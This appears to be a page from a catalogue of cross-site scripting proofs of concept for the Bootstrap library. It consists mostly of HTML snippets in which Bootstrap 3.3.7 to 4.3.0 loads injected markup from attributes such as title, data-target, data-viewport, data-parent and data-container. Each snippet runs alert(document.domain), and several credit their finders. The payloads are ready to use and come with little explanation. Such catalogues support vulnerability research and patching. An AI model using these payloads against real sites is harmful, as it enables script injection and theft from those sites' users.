The most popular HTML, CSS, and JavaScript framework for developing responsive, mobile first projects on the web.
The Bootstrap library was loading HTML from the title attribute. An hover interaction is required.
<script nonce="secret" src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script nonce="secret" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script nonce="secret" src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/js/bootstrap.min.js"></script>
<!-- user input -->
<x data-toggle="tooltip" data-html="true" title="<script>alert(document.domain)</script>">Hover me</x>
<script nonce="secret">
$("[data-toggle='tooltip']").tooltip();
</script>Related links:
Found by @zozuar.
The Bootstrap library was loading HTML from the data-target attribute.
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<!-- user input -->
<x data-spy="affix" data-target="<img src=x onerror=alert(document.domain)>">XSS</x>Related links:
The Bootstrap library was loading HTML from the data-viewport attribute.
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<!-- user input -->
<x data-toggle="tooltip" data-viewport="<img src=x onerror=alert(document.domain)>"></x>
<script>
$('[data-toggle="tooltip"]').tooltip();
</script>Related links:
The Bootstrap library was loading HTML from the data-parent attribute. An click interaction is required.
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<!-- user input -->
<x id="x" data-toggle="collapse" href="#x" data-parent="<img src=x onerror=alert(document.domain)>">Click me</x>Related links:
Found by 1Jesper1.
The Bootstrap library was loading HTML from the data-target attribute. An click interaction is required.
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<!-- user input -->
<x data-spy="scroll" data-target="<img src=x onerror=alert(document.domain)>">XSS</x>Related links:
Found by 1Jesper1.
The Bootstrap library was loading HTML from the data-container attribute. An hover interaction is required.
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<!-- user input -->
<x data-toggle="tooltip" data-container="<img src=x onerror=alert(document.domain)>">Hover me</x>
<script>
$('[data-toggle="tooltip"]').tooltip();
</script>Related links:
Found by 1Jesper1.
The Bootstrap library was loading HTML from the data-target attribute. An click interaction is required.
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js"></script>
<!-- user input -->
<x data-toggle="collapse" data-target="<img src=x onerror=alert(document.domain)>">Click me</x>Related links: